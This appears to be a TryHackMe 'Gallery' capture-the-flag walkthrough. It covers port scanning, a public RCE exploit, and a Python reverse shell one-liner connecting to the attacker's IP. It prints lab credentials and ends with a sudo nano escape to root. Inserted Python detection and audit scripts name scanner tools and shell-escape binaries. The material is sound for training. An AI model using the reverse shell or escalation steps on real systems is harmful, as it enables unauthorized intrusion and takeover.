Tryhackme - Gallery

In this walk through, we will be going through the Gallery room from Tryhackme. This room is rated as Easy on the platform and in this we will try to exploit an image gallery system to capture the root flag. So, let’s get started without any delay.

Gallery

Machine Info:

Title: Gallery PwnKit Solve
IP address: 10.10.71.178
Difficulty: Easy
Objective: Try to exploit our image gallery system

Enumeration:

  • I started off with my regular nmap scan and found two open ports – 80 and 8080 (both HTTP).

sudo nmap -sS -sV 10.10.168.35

nmap scan

  • I took a look at port 80 and found the default Apache page. Nothing fancy!

Apache2 Default Page

  • Next, I looked at port 8080, which presented a “Simple Image Gallery System” login page.

Simple Image Gallery System

  • Fired gobuster at port 80 and found a /gallery directory, which redirects to the same application that is served on port 8080.

wh1terose@fsociety:~$ gobuster dir -u http://10.10.168.35/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.168.35/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/11/20 21:14:49 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.hta                 (Status: 403) [Size: 277]
/gallery              (Status: 301) [Size: 314] [--> http://10.10.168.35/gallery/]

gobuster scan
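As an added defensive counterpart (not part of the original walkthrough): a gobuster run like the one above leaves a recognisable trace in the Apache access log, a burst of 403/404 responses from a single client that announces itself with a scanner User-Agent. The script below parses constructed combined-format log lines (the client IPs, the threshold and the log lines themselves are assumptions) and flags such clients.

```python
import re
from collections import defaultdict

# Apache "combined" log format; the sample lines below are constructed, not the room's real logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Substrings of User-Agents that well-known directory brute-forcers send by default.
SCANNER_UA = ("gobuster", "dirbuster", "nikto", "sqlmap", "feroxbuster")

SAMPLE_LOG = """\
10.18.1.78 - - [20/Nov/2023:21:14:49 +0000] "GET /.htpasswd HTTP/1.1" 403 277 "-" "gobuster/3.1.0"
10.18.1.78 - - [20/Nov/2023:21:14:49 +0000] "GET /.htaccess HTTP/1.1" 403 277 "-" "gobuster/3.1.0"
10.18.1.78 - - [20/Nov/2023:21:14:49 +0000] "GET /.hta HTTP/1.1" 403 277 "-" "gobuster/3.1.0"
10.18.1.78 - - [20/Nov/2023:21:14:50 +0000] "GET /gallery HTTP/1.1" 301 314 "-" "gobuster/3.1.0"
10.18.1.78 - - [20/Nov/2023:21:14:50 +0000] "GET /admin HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
192.168.1.20 - - [20/Nov/2023:21:15:02 +0000] "GET /gallery/ HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
192.168.1.20 - - [20/Nov/2023:21:15:03 +0000] "GET /missing.png HTTP/1.1" 404 275 "-" "Mozilla/5.0"
"""

def parse(line):
    """Return the fields of one combined-format line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_scanners(log_text, error_threshold=3):
    """Return {client ip: [reasons]} for clients that look like directory brute-forcers."""
    errors = defaultdict(int)   # count of 403/404 responses per client
    uas = defaultdict(set)      # distinct User-Agents seen per client
    for line in log_text.splitlines():
        rec = parse(line)
        if not rec:
            continue
        if rec["status"] in ("403", "404"):
            errors[rec["ip"]] += 1
        uas[rec["ip"]].add(rec["ua"].lower())
    flagged = {}
    for ip in uas:
        reasons = []
        if errors[ip] >= error_threshold:
            reasons.append(f"{errors[ip]} 403/404 responses")
        if any(name in ua for ua in uas[ip] for name in SCANNER_UA):
            reasons.append("scanner user-agent")
        if reasons:
            flagged[ip] = reasons
    return flagged

if __name__ == "__main__":
    for ip, reasons in find_scanners(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```

The legitimate client with a single 404 stays below the threshold, so only the brute-forcing client is reported.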

  • Moving on, I looked for known exploits for the running CMS and found an unauthenticated RCE exploit.

Simple Image Gallery 1.0 - RCE

Initial Access:

  • Used the exploit to obtain a web shell and with it the initial foothold on the system.

searchsploit Simple Image

searchsploit Simple Image

python exploit

command execution

  • Next, I used the Python reverse shell below to get a more stable shell and caught the connection on my netcat listener.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.18.1.78",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

executing the reverse shell

netcat listener

  • While looking around the file system, I found the initialize.php file, in which the database credentials were hardcoded in clear text.

cat initialize.php

  • Used those credentials to log in to the MySQL database and dumped the admin user's password hash.

www-data@gallery:/tmp$ mysql -u gallery_user -p 
mysql -u gallery_user -p
Enter password: passw0rd321

mysql login

admin password

Privilege Escalation:

  • Now I ran LinPEAS to enumerate the system for privilege escalation vectors and found a password in a history file. I used that password to log in as mike.

linpeas result

b3stpassw0rdbr0xx

user flag

  • Next, I checked the sudo permissions of user mike and found that he can run /bin/bash on the /opt/rootkit.sh file as root.

sudo -l

sudo -l

  • Checking the contents of rootkit.sh, it is a small script that uses a case statement to present a menu of choices. The last one, which opens nano, got my attention.

cat rootkit.sh

  • Used the GTFOBins technique for nano to break out of the editor and get a root shell.

GTFObins nano

  • I initially had problems executing the “read” option. After upgrading my shell to a full TTY, I tried again and it worked.

rootkit.sh

  • Used it to get the root shell and captured the flag.

nano priv esc

root flag
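The three weaknesses this walkthrough chained (database credentials hardcoded in initialize.php, a password left in a shell history file, and a sudo-permitted script that opens nano) can all be caught by a local audit before an attacker needs them. The Python below is an added example, not the room's script or the author's code; the sample menu script, history and PHP fragment are constructed stand-ins modelled on the page's descriptions, and the list of shell-escape-capable programs is an assumption drawn from GTFOBins.

```python
import re

# Interactive programs that can drop to a shell when run under sudo (GTFOBins-style escapes).
SHELL_ESCAPE_BINS = {"nano", "vi", "vim", "less", "more", "man", "python", "perl"}
CMD_SPLIT = re.compile(r"[;|&()]+")   # boundaries between simple commands on one shell line
# Credentials passed on a command line: mysql -pSECRET, --password=SECRET, PASSWORD=SECRET.
CRED_ON_CMDLINE = re.compile(r"(?<=\s)-p\S{4,}|--password=\S+|\bpassword\s*=\s*\S+", re.I)
# PHP assignments of a string literal to a variable whose name suggests a secret.
PHP_SECRET = re.compile(r"\$(\w*(?:pass|pwd|secret)\w*)\s*=\s*['\"][^'\"]+['\"]", re.I)

# Constructed stand-in for a sudo-run menu script like the page's rootkit.sh (not the real file).
SAMPLE_SCRIPT = """#!/bin/bash
read -p "Choose an option: " choice
case $choice in
  read) cat /root/report.txt ;;
  versions) uname -a ;;
  nano) nano /root/report.txt ;;
esac
"""
# Constructed shell history in the style of what LinPEAS surfaces.
SAMPLE_HISTORY = "ls -la\nmysql -u gallery_user -ppassw0rd321 gallery_db\nsu mike\nsudo -l\n"
# Constructed PHP config fragment with hardcoded database credentials, as in initialize.php.
SAMPLE_PHP = "<?php\n$db_host = 'localhost';\n$db_user = 'gallery_user';\n$db_pass = 'passw0rd321';\n"

def risky_sudo_script_lines(script):
    """(line number, program) for each line whose command is a shell-escape-capable binary."""
    hits = []
    for n, line in enumerate(script.splitlines(), 1):
        found = set()
        for seg in CMD_SPLIT.split(line.split("#", 1)[0]):   # ignore comments
            words = seg.split()
            if words and words[0].rsplit("/", 1)[-1] in SHELL_ESCAPE_BINS:
                found.add(words[0].rsplit("/", 1)[-1])
        hits.extend((n, prog) for prog in sorted(found))
    return hits

def history_lines_with_credentials(history):
    """Line numbers of history entries that carry a password on the command line."""
    return [n for n, line in enumerate(history.splitlines(), 1) if CRED_ON_CMDLINE.search(line)]

def php_hardcoded_secrets(php):
    """Names of PHP variables assigned a literal, secret-looking string."""
    return [m.group(1) for m in PHP_SECRET.finditer(php)]

if __name__ == "__main__":
    print("sudo script shell escapes:", risky_sudo_script_lines(SAMPLE_SCRIPT))
    print("history lines with credentials:", history_lines_with_credentials(SAMPLE_HISTORY))
    print("hardcoded PHP secrets:", php_hardcoded_secrets(SAMPLE_PHP))
```

Each finding maps to a fix the walkthrough implies: move database credentials out of the PHP source into a file readable only by the web server user, clear and restrict shell history, and never let a sudo rule reach an interactive editor (use sudoedit or a non-interactive command instead).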

Task 1 – Deploy and get a Shell

Question 1 – How many ports are open?

Question 2 – What’s the name of the CMS?

Question 3 – What’s the hash password of the admin user?

Question 4 – What’s the user flag?

Task 1 - Deploy and get a Shell

Task 2 – Escalate to the root user

Question 1 – What’s the root flag?

Task 2 - Escalate to the root user

Conclusion:

So that was “Gallery” for you. We started with an nmap scan with the service version detection flag set and found two open ports – 80 and 8080 (HTTP). Enumerating port 8080 revealed a Simple Image Gallery System login page. We looked for known exploits for the running CMS, found an RCE exploit, used it to upload and execute a reverse shell on the target, and got the initial foothold. Next, we found the MySQL credentials in the initialize.php file and used them to dump the admin password hash. Moving on, LinPEAS surfaced the password of user mike in a history file, and with it we switched to user mike. We then looked at the user's sudo permissions and found that mike can run the rootkit.sh script as root. The script uses several binaries, and out of them we abused nano, following GTFOBins, to get root access on the target and capture the flag. On that note, I would take your leave and will meet you in the next one. Till then, “Happy hacking”.
